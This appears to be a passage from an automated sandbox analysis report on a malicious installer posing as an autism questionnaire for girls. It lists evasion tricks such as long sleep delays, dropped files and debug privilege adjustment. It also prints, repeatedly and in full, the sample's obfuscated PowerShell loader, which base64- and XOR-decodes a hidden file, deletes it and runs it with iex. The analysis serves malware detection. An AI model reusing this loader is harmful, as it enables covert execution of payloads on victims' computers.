            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep count: 299 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep count: 4106 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep count: 312 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep count: 3994 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272Thread sleep count: 162 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7376Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5931Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1629Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5626Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1533Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2708
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4906
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4106
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3994
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-20151
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004AF91C GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_004AF91C
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0040AEF4 FindFirstFileW,FindClose,0_2_0040AEF4
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_0040A928
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_0060C2B0 FindFirstFileW,GetLastError,3_2_0060C2B0
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_0040E6A0 FindFirstFileW,FindClose,3_2_0040E6A0
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,3_2_0040E0D4
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,3_2_006B8DE4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: powershell.exe, 0000000C.00000002.460628955.0000000004FCB000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.456184997.0000000005C9D000.00000004.00000001.sdmpBinary or memory string: Hyper-V
            Source: powershell.exe, 0000000C.00000002.460628955.0000000004FCB000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.457902376.0000000004A40000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.453141956.0000000005710000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.456184997.0000000005C9D000.00000004.00000001.sdmpBinary or memory string: Oh:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Yara detected Powershell dedcode and executeShow sources
            Source: Yara matchFile source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.4ujEuSR7.20211211144038.txt, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.zcmp3+HP.20211211144037.txt, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.dw4EHDML.20211211144038.txt, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.q4FgjTZQ.20211211144035.txt, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.O+ospPLn.20211211144035.txt, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.SX01lhy_.20211211144040.txt, type: DROPPED
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_006A60E8 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,3_2_006A60E8
